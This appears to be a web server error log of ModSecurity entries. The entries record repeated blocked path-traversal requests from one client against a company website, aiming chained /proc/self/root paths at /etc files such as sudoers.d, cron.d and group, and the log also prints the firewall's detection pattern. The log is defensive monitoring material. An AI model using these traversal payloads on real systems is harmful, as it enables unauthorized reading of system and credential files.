[Fri Mar 20 06:06:17.368452 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:54414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OCeoXxyEfFpUF8f9rvQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:18.699547 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:54416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OCgF0L0L-SsrnPo5R-wAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:21.252247 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:36520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ODfqxLDW4GITHUkTO_AAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:22.609936 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:36526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ODrninkcc-iUj5ApIXgAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:23.934969 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:36530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OD_XLqtnMIWvjpaKEYwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:25.246944 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:36546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OETJ3M9BSuKP7CAYBNwAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:26.543698 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:36560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OEl1pVZ5mVmJwsFMZ-AAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:30.795004 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:36576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OFgF0L0L-SsrnPo5SAwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:32.123197 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:34994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OGPqxLDW4GITHUkTPAgAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:33.511777 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:35004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OGbninkcc-iUj5ApIagAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:41.039472 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:35008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OH9a6ubjKNq_cu4a8ogAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:51.277622 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:41470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OK9a6ubjKNq_cu4a8tQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:56.132563 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:51800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OMF1pVZ5mVmJwsFMaBAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:06:58.491841 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:51802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OMhCii7xarUs8iHZSOAAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:06:59.826291 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:44028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OMxCii7xarUs8iHZSOQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:01.127941 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:44038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ONV1pVZ5mVmJwsFMaBQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:03.161503 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:44044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ONgF0L0L-SsrnPo5SDAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:04.556112 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:44050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OOBCii7xarUs8iHZSPgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:05.943182 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:44062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OObninkcc-iUj5ApIeQAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:07.137752 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:44070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OO_HIg5MgXLBnicPkBwAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:08.402780 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:44076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OPDJ3M9BSuKP7CAYBXgAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:15.771496 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:52544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OQ-oXxyEfFpUF8f9r8wAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
